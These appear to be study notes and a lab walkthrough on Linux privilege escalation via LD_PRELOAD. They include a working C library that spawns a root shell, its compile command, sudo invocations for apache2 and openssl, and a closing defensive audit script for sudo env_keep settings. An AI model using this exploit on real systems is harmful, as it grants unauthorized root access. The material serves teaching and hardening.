# Intro

- Very common for Linux binaries to use dynamically linked shared object libraries
- Libraries contain compiled code or other data that developers use to avoid having to re-write the same pieces of code across multiple programs
- Two types of libraries exist in Linux:
    - `static libraries` - denoted by the `.a` file extension
    - `dynamically linked shared object libraries` - denoted by the `.so` file extension
- When a program is compiled, static libraries become part of the program and cannot be altered
- In contrast, dynamic libraries can be modified to control the execution of the program that calls them

## Dynamic Library Enum

- Multiple methods exist for specifying the location of dynamic libraries, so the system will know where to look for them on program execution
- This includes:
    - using `-rpath` or `-rpath-link` flags when compiling a program
    - using env vars `LD_RUN_PATH` or `LD_LIBRARY_PATH`
    - placing libraries in the `/lib` or `/usr/lib` default directories
    - specifying another directory containing the libraries within the `/etc/ld.so.conf` config file
- Additionally, the `LD_PRELOAD` env var can be used to load a library before executing a binary
    - The functions from this library are given preference over the default ones
- The shared objects required by a binary can be viewed using the `ldd` utility
- Below we use the `ldd` command to see the `.so` files (and the associated absolute paths) for the `ls` binary

```bash
ldd /bin/ls
linux-vdso.so.1 => (0x00007fff03bc7000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f4186288000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4185ebe000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007f4185c4e000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f4185a4a000)
/lib64/ld-linux-x86-64.so.2 (0x00007f41864aa000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f418582d000)
```

# `LD_PRELOAD` Privesc

- First, enum the current user's sudo privs
```bash
sudo -l
Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart
```

- While there is no privesc vector for `apache2 restart` per GTFOBins, we see that `env_keep+=LD_PRELOAD` is included in the sudo `Defaults` entries, so `LD_PRELOAD` survives `env_reset`
- We can restart the `apache2` bin and use `LD_PRELOAD` to run a malicious library prior to `apache2`
- First, create the library below to exploit `LD_PRELOAD`

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

// Runs when the library is loaded; -nostartfiles lets this replace the default init
void _init() {
    unsetenv("LD_PRELOAD");   // stop the spawned shell from preloading us again
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```

- Next, compile the new library

```bash
gcc -fPIC -shared -o root.so root.c -nostartfiles
```

- Finally, use the below command to restart `apache2` and load the malicious library
    - NOTE: Absolute paths must be specified

```bash
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
```

---

# Exercise

- `ping` test

![[images/Pasted image 20260211193021.png]]

- `nmap` scans

![[images/Pasted image 20260211195756.png]]

- `ssh` into target with given creds
- light internal enum on target

![[images/Pasted image 20260211193142.png]]

- `ld_preload` is set and we can run `openssl` as root

## Exploit `ld_preload`

- create malicious file on target

![[images/Pasted image 20260211193346.png]]

- compile malicious file into a library

![[images/Pasted image 20260211193431.png]]

- run with below command

```bash
sudo LD_PRELOAD=./root.so /usr/bin/openssl
```

- privesc worked!

![[images/Pasted image 20260211193553.png]]

- navigate to `/root/ld_preload` and `cat` flag

![[images/Pasted image 20260211193652.png]]
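As an added defender-side check (not part of the original notes), the POSIX shell functions below parse `sudo -l` output like the dump in the privesc section and flag any dynamic-loader variable that `env_keep` adds back after `env_reset`, which is the misconfiguration both the walkthrough and the exercise rely on. The two sample dumps are constructed, and the function names are my own.

```shell
# Constructed sample of `sudo -l` output, modelled on the dump shown above
SAMPLE_RISKY='Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart'

# Constructed sample of a hardened configuration: env_reset keeps only locale vars
SAMPLE_SAFE='Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="LANG LC_ALL"

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart'

# Read `sudo -l` output on stdin and print each dynamic-loader variable that
# env_keep preserves. Handles both env_keep+=VAR and env_keep+="VAR1 VAR2".
kept_loader_vars() {
    grep -oE 'env_keep\+?="[^"]*"|env_keep\+?=[^, ]*' \
        | sed -E 's/^env_keep\+?=//; s/"//g' \
        | tr ' ' '\n' \
        | grep -E '^LD_(PRELOAD|LIBRARY_PATH|AUDIT)$' \
        | sort -u
}

# Audit one `sudo -l` dump passed as $1: returns 0 when clean, 1 when a
# loader variable survives env_reset (the condition abused above).
audit_sudo_env() {
    vars=$(printf '%s\n' "$1" | kept_loader_vars)
    if [ -n "$vars" ]; then
        printf 'RISK: sudo keeps %sacross env_reset; remove it from env_keep in /etc/sudoers\n' \
            "$(printf '%s' "$vars" | tr '\n' ' ')"
        return 1
    fi
    printf 'OK: no dynamic-loader variables survive sudo env_reset\n'
    return 0
}

# On a live host: audit_sudo_env "$(sudo -l 2>/dev/null)"
```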